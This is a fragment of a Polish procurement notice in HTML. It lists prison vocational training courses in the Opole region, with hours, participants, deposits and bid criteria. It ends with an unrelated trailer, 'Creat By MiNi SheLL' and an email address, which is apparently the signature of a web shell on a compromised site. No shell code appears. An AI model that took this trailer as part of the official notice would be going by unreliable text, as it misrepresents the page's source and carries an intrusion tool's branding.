Cykl nr 4. Ogrodnik z obsługą kos spalinowych połączony z aktywizacją zawodową, ilość godzin  110, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 5. Ogrodnik z obsługą kos spalinowych połączony z aktywizacją zawodową, ilość godzin  110, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 6. Pilarz z obsługą spalinowych pilarek łańcuchowych połączony z aktywizacją zawodową, ilość godzin 110, ilość uczestników  12 osadzonych mężczyzn.
Wadium: 1 080 PLN.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80500000-9, 80530000-8,
                    80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>60.00</td></tr><tr><td>termin płatności</td><td>17.00</td></tr><tr><td>uprawnienia pedagogicz</td><td>18.00</td></tr><tr><td>marginalizacja</td><td>5.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karępozbawienia wolności w Zakładzie Karnym nr 1 w Strzelcach Opolskich.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cykl nr 1. Malarz-szpachlarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 2. Malarz-szpachlarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 3. Opiekun osób starszych i niepełnosprawnych połączony z aktywizacją zawodową, ilość godzin  130,ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 4. Ogrodnik połączony z aktywizacją zawodową, ilość godzin  100, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 5. Płytkarz-posadzkarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 6. Fryzjer męski połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Wadium: 1 080 PLN.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80500000-9, 80530000-8,
                    80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>60.00</td></tr><tr><td>termin płatności</td><td>17.00</td></tr><tr><td>uprawnienia pedagogiczne</td><td>18.00</td></tr><tr><td>marginalizacja</td><td>5.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karępozbawienia wolności w Zakładzie Karnym nr 2 w Strzelcach Opolskich.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cykl nr 1. Brukarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Brukarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 3. Płytkarz-posadzkarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 4. Malarz-tapeciarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 5. Malarz-tapeciarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 6. Płytkarz-posadzkarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Wadium: 1080,00 PLN.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80500000-9, 80530000-8,
                    80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>60.00</td></tr><tr><td>termin płatnosci</td><td>17.00</td></tr><tr><td>uprawienia pedagogiczne</td><td>18.00</td></tr><tr><td>marginalizacja</td><td>5.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karępozbawienia wolności w Areszcie Śledczym Opolu.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cykl nr 1. Malarz połączony z aktywizacją zawodową, ilość godzin  135, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Ogrodnik połączony z aktywizacją zawodową, ilość godzin  184, ilość uczestników  12 osadzonych kobiet.
Cykl nr 3. Konserwator powierzchni płaskich połączony z aktywizacją zawodową, ilość godzin  135, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 4. Kurs komputerowy z obsługą programu magazynowego połączony z aktywizacją zawodową, ilość godzin  135, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 5. Malarz połączony z aktywizacją zawodową, ilość godzin  135, ilość uczestników  12 osadzonych mężczyzn.
Wadium: 900 PLN.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80500000-9, 80530000-8,
                    80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>60.00</td></tr><tr><td>termin  płatności</td><td>17.00</td></tr><tr><td>uprawnienia pedagogzne</td><td>18.00</td></tr><tr><td>marginalizacja</td><td>5.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com